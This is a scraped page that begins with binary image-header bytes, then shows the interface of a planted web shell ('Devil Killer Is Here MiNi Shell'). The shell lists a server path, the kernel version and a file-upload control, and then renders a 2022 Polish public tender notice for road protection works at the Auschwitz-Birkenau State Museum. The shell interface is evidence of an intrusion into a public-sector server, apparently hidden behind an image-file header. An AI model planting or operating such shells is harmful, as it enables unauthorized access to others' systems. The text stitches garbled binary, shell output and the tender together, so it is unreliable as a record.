JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220323/0009568801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> wykonanie zabezpieczenia drogi poobozowej usytuowanej na odcinku BI byłego KL Auschwitz II-Birkenau na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276015</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Więźniów Oświęcimia 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@auschwitz.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.auschwitz.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa Instytucja Kultury </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> wykonanie zabezpieczenia drogi poobozowej usytuowanej na odcinku BI byłego KL Auschwitz II-Birkenau na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3b52ef95-aa96-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00095688</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00056226/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Zabezpieczenie dróg poobozowych zlokalizowanych na odcinki BI byłego KL Auschwitz II-Birkenau</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl<br/>https://bip.malopolska.pl/auschwitz,m,344853,2021.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:Złożenie<br/>oferty wraz z oświadczeniem i innymi dokumentami wymienionymi w Dziale XI pkt 7 SWZ oraz jej<br/>wycofanie odbywa się przy użyciu miniPortalu zamieszczonego na stronie internetowej<br/>https://miniportal.uzp.gov.pl/. System miniPortal zapewnia bezpłatną możliwość szyfrowania ofert.<br/>Wymagania techniczne i organizacyjne wysyłania oraz odbierania dokumentów elektronicznych<br/>składających się na ofertę wraz z oświadczeniem i innymi dokumentami wymienionymi w Dziale XI pkt.<br/>7 SWZ oraz jej wycofanie opisane zostały w Instrukcji korzystania z miniPortalu<br/>zamieszczonej na stronie internetowej: https://miniportal.uzp.gov.pl/Instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO znajduje się w Dziale XXI<br/>SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna RODO znajduje się w Dziale XXI<br/>SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 459350,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> wykonanie zabezpieczenia drogi poobozowej usytuowanej na odcinku BI byłego KL Auschwitz<br/>II-Birkenau na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">154 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych<br/>robót, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp o wartości nie większej niż do<br/>50% wartości zamówienia podstawowego. Zamówienie będzie polegało na powtórzeniu<br/>robót budowlanych stanowiących przedmiot zamówienia podstawowego.<br/>Zamówienie zostanie udzielone Wykonawcy zamówienia podstawowego w przypadku, gdy zaistnieje uzasadniona potrzeba i możliwość rozszerzenia zamówienia podstawowego oraz zostaną zapewnione środki finansowe na ten cel. Wysokość wynagrodzenia Wykonawcy za realizację zamówienia polegającego na powtórzeniu podobnych robót budowlanych zostanie ustalona na podstawie stawek brutto zawartych w ofercie Wykonawcy za:<br/>a) Przeprowadzenie badań archeologicznych wraz z pracami ziemnymi polegającymi na ręcznym odsłonięciu (siłami budowlanymi) nawierzchni drogi historycznej pod nadzorem archeologicznym zgodnie z warunkami określonymi w pozwoleniu Małopolskiego Wojewódzkiego Konserwatora Zabytków wraz z opracowaniem wyników oraz dokumentacją z przeprowadzonych badań archeologicznych, b) Wykonanie 1m2 nowych warstw podbudowy i nawierzchni na istniejących, bez zmian<br/>warstwach drogi historycznej oraz muldy trawiastej wraz z dokumentacją<br/>powykonawczą, c) Konserwację 1 dm2 obiektów metalowych.<br/>Przewidziane wynagrodzenie za wykonanie zamówienia polegającego na powtórzeniu podobnych robót budowlanych będzie wynagrodzeniem kosztorysowym. Zamówienie zostanie udzielone dotychczasowemu Wykonawcy pod warunkiem, że zrealizował roboty budowlane objęte niniejszym postępowaniem w terminie i z najwyższą starannością,<br/>zapewni nie gorszy standard wykonywania nowego zamówienia niż podstawowego, przy zawieraniu umowy na zamówienie polegające na powtórzeniu podobnych robót budowlanych – zaakceptuje istotne warunki umowy odnoszącej się do zamówienia podstawowego z uwzględnieniem różnic wynikających z wartości, czasu realizacji i innych<br/>istotnych okoliczności mających miejsce w chwili udzielania zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowe doświadczenie kierownika robót</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu o udzielenie zamówienia publicznego udział mogą brać Wykonawcy,<br/>którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub<br/>zawodowej, tj.:<br/>Zamawiający wymaga, aby Wykonawca w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie wykonał:<br/>- roboty budowlane dotyczące minimum 2 (dwa) zadań utwardzenia traktów pieszojezdnych w parkach przynależnych do obiektów zabytkowych wpisanych do rejestru<br/>zabytków lub innego właściwego rejestru*, inwentarza muzeum będącego instytucją<br/>kultury lub budowy ciągów ulicznych objętych ochroną konserwatorską<br/>z tym, że wynagrodzenie za wykonanie co najmniej jednego z powyższych zadań<br/>wynosiło nie mniej niż 250 000 zł brutto<br/>Wartość prac określonych w walucie innej niż PLN Wykonawca przeliczy w złotych<br/>według kursu średniego NBP (tabela A) na dzień zakończenia prac i robót budowlanych<br/>Zamawiający wymaga, aby Wykonawca dysponował:<br/>a) co najmniej jedną (1) osobą, którą skieruje do realizacji zamówienia przewidzianą do<br/>pełnienia funkcji Kierownika budowy:<br/>- posiadającego uprawnienia do kierowania robotami budowlanymi w specjalności<br/>konstrukcyjno-budowlanej lub drogowej bez ograniczeń, określone przepisami<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane,<br/>- posiadającego kwalifikacje i praktykę określone w art. 37c ustawy z dnia 23 lipca<br/>2003 r. o ochronie zabytków i opiece nad zabytkami;<br/>9<br/>- mogącego się wykazać udziałem w co najmniej 3 robotach budowlanych (licząc od<br/>momentu uzyskania uprawnień do kierowania robotami budowlanymi) na<br/>stanowisku kierownika budowy wg wymaganych kodów CPV:<br/>45233253-7 Roboty w zakresie nawierzchni dróg dla pieszych<br/>45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne<br/>45233200-1 Roboty w zakresie różnych nawierzchni<br/>45111291-4 Roboty w zakresie zagospodarowania terenu<br/>45233161-5 Roboty budowlane w zakresie ścieżek pieszych<br/>z zastrzeżeniem, że powyższe doświadczenie obejmuje okres ostatnich 5 lat przed<br/>dniem składania ofert,<br/>b) co najmniej jedną (1) osobą, którą skieruje do realizacji zamówienia przewidzianą do<br/>pełnienia funkcji Kierownika robót posiadającego uprawnienia do kierowania robotami<br/>budowlanymi w specjalności drogowej bez ograniczeń oraz mogącego wykazać się<br/>udziałem w minimum jednej (1) robocie budowlanej polegającej na realizacji ciągu<br/>pieszo-jezdnego o nawierzchni mineralnej wodoprzepuszczalnej lub budowie ciągów<br/>ulicznych objętych ochroną konserwatorską na stanowisku kierownika robót (licząc od<br/>dnia uzyskania uprawnień zawodowych) wg wymaganych kodów CPV:<br/>45233253-7 Roboty w zakresie nawierzchni dróg dla pieszych<br/>45233200-1 Roboty w zakresie różnych nawierzchni<br/>45233161-5 Roboty budowlane w zakresie ścieżek pieszych<br/>z zastrzeżeniem, że powyższe zadanie było wykonane w okresie ostatnich 5 lat przed<br/>dniem składania ofert.<br/>c) Archeologiem pełniącym nadzór archeologiczny, który posiada uprawnienia do<br/>prowadzenia badań archeologicznych zgodnie z art. 37e ustawy o ochronie zabytków<br/>(Dz.U. z 2003 r. Nr 162, poz. 1568 z późniejszymi zmianami), tj.: badaniami<br/>archeologicznymi kieruje osoba, która ukończyła studia drugiego stopnia lub jednolite<br/>studia magisterskie, w zakresie archeologii i przez co najmniej 12 miesięcy brała udział<br/>w badaniach archeologicznych (doświadczenie zawodowe może być nabyte poza<br/>terytorium Rzeczypospolitej Polskiej). Dodatkowo w okresie trzech lat przed datą<br/>otwarcia przetargu wykonał co najmniej 3 usługi polegające na kierowaniu badaniami<br/>archeologicznymi związanymi z wykonywaniem robót budowlanych lub prac<br/>konserwatorskich przy obiekcie wpisanym do rejestru zabytków będącym obiektem<br/>murowanym lub obiektem związanym z funkcjonowaniem założeń obozowych z<br/>okresów wojen nowożytnych.<br/>Uwaga: Zamawiający dopuszcza połączenie funkcji kierownika budowy z funkcją kierownika<br/>robót o wymaganych przez zamawiającego specjalnościach. Kierownik budowy i kierownicy<br/>robót powinni posiadać uprawnienia budowlane bez ograniczeń zgodnie z ustawą z dnia 07<br/>lipca 1994 r. Prawo budowlane (tj. Dz.U. 2017 poz. 1332. z p.zm.) oraz rozporządzeniem<br/>Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji<br/>technicznych w budownictwie (tj. Dz. U z 2014 r. poz. 1278) lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w<br/>budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których<br/>odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach<br/>odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(jt. Dz.U. z 2016, poz. 65). Zamawiający dopuszcza zgodnie z zapisami art. 20a Ustawy z dnia<br/>10<br/>15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j.<br/>Dz.U. z 2014 r. poz. 1946, z 2016 r. poz. 65) uprawnienia do „świadczenia usług<br/>transgranicznych”. Zamawiający wskazuje, iż obywatel państwa członkowskiego, posiadający<br/>kwalifikacje zawodowe architekta, inżyniera budownictwa lub urbanisty, który prowadzi<br/>zgodnie z prawem działalność w zakresie tego zawodu w innym niż Rzeczpospolita Polska<br/>państwie członkowskim ma prawo do tymczasowego i okazjonalnego wykonywania zawodu<br/>na terytorium Rzeczpospolitej Polskiej, bez konieczności uznawania kwalifikacji zawodowych,<br/>z zastrzeżeniem wymogów określonych w ust. 2-11 ww. przepisu. W takiej sytuacji, osoby<br/>wskazane w powyższym przepisie, nie są obowiązane do przeprowadzenia procedury uznania<br/>kwalifikacji zawodowych w trybie przewidzianym w art. 33a wyżej wskazanej ustawy. W celu<br/>potwierdzenia wykonywania określonej działalności w charakterze „usługi transgranicznej”<br/>dana osoba musi posiadać m.in. tymczasowy wpis na listę członków właściwej izby samorządu<br/>zawodowego, zgodnie z art. 20a ust. 6 powołanej ustawy.<br/>* Przez „inny właściwy rejestr” ze względu na miejsce położenia zabytku Zamawiający<br/>rozumie każdy, tak w Europie, jak i na świecie rejestr bądź wykaz, ewidencję zabytków będący<br/>odpowiednikiem rejestru zabytków w rozumieniu ustawy z dnia 23 lipca 2003r. o ochronie<br/>zabytków i opiece nad zabytkami (Dz. U. z 2003 r. Nr 162, poz. 1568 z późniejszymi<br/>zmianami). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, nie będzie wezwany do złożenia podmiotowych środków dowodowych w celu wykazania braku podstaw wykluczenia z postępowania</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W związku z bezpośrednim powiązaniem spełniania warunku udziału w postępowaniu dotyczącego zdolności technicznej i zawodowej w zakresie wykazania przez Wykonawcę dysponowania osobą, którą skieruje do realizacji zamówienia (określonego w pkt 3.2. Działu V SWZ) z Kryterium oceny ofert nr 3 (określonym jako kryterium nr 3 w Dziale XV SWZ) Zamawiający wymaga złożenia wraz z ofertą Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 5 do SWZ).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwa winny<br/>być załączone do oferty. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane<br/>wykonają poszczególni Wykonawcy. (Wzór stanowi Załącznik nr 6 do SWZ).<br/>4.2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu<br/>do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>4.3. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa powyżej w pkt 4.2.,<br/>potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>4.3.1. zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>4.3.2. sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>4.3.3. czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą. Wzór zobowiązania stanowi Załącznik nr 8 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwa<br/>winny być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają 